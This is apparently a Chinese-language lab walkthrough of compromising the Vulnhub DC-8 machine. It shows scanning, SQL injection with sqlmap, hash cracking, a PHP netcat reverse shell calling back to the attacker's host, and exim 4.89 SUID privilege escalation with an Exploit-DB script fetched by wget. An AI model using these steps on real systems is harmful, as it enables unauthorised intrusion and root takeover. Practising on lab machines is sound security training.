一、 環境搭建

Vulnhub上下載DC8

把它倒入vm虛擬機器

二、 資訊收集

虛擬機器開kali直接nmap掃一掃本機的網段

發現了兩個主機但是呢已經知道了128是本機ip那就是129了，開啟了80和22埠然後直接去80看看

發現了網頁那就先掏出dirsearch掃目錄，掃出來很多就很舒服了

那就開始吧先挑重要的看，先是翻到了是Drupal cms然後就直接去搜漏洞利用了後面又翻到了一個登入，還有一個web.config，還有robots.txt寫漏了

這個站看著像是有注入，打了一發單引號就把路徑爆出來了

那好吧那就直接sqlmap梭一把，簡直沒問題

賬號密碼有了剛剛的後臺也有了那就沖沖，kali用john解密Admin沒解出來，john的密碼為turtle，翻到了一個檔案上傳只能傳圖片那就先跳過再翻翻，煩得要死

翻到這裡有一個寫PHP程式碼的直接寫一個反彈shell

<?php system("nc -e /bin/sh 192.168.101.128 1234")?>

順便kali監聽一下埠

使用python得到互動式shell

python -c "import pty;pty.spawn('/bin/bash')"

用find / -user root -perm -4000 -print 2>/dev/null檢視使用有利用suid提權的命令發現exim4有root許可權這可能是一個突破口（SUID可以讓呼叫者以檔案擁有者的身份執行該檔案，所以我們利用SUID提權的思路就是執行root使用者所擁有的SUID的檔案，那麼我們執行該檔案的時候就得獲得root使用者的身份了。）

檢視版本/usr/sbin/exim4 --version，版本為4.89

那就拿出msf使用searchsploit exim 4，查詢到可以利用本地提權的方法

cp /usr/share/exploitdb/exploits/linux/local/46996.sh /home/root.sh，將利用指令碼複製出來

把root.sh放/var/www/html下然後讓靶機wget下載

開啟root.sh需要使用set ff=unix，使用unix換行符。不然就無法使用指令碼

然後把靶機切換到有寫入許可權的/tmp目錄中中，使用wget命令下載root.sh提權指令碼

然後給執行許可權chmod 777 root.sh

./root.sh -m netcat和./root.sh -m setuid這兩種方式看誰可以就誰

這有一個坑就是必須要轉換格式，搞了半天真是服

shell指令碼報錯/bin/bash^M: bad interpreter: No such file or directory，通過查閱資料得知，shell指令碼格式必須是unix才行

1.sed -i "s/\r//" filename 或sed -i "s/^M//" filename，直接將回車符替換為空字串。

2.vim filename，編輯檔案，執行“: set ff=unix”，將檔案設定為unix格式，然後執行“:wq”，儲存退出。

3.dos2unix filename或busybox dos2unix filename，如果提示command not found，可以使用前兩種方法。

拿下了，中途各種問題沒有這麼順利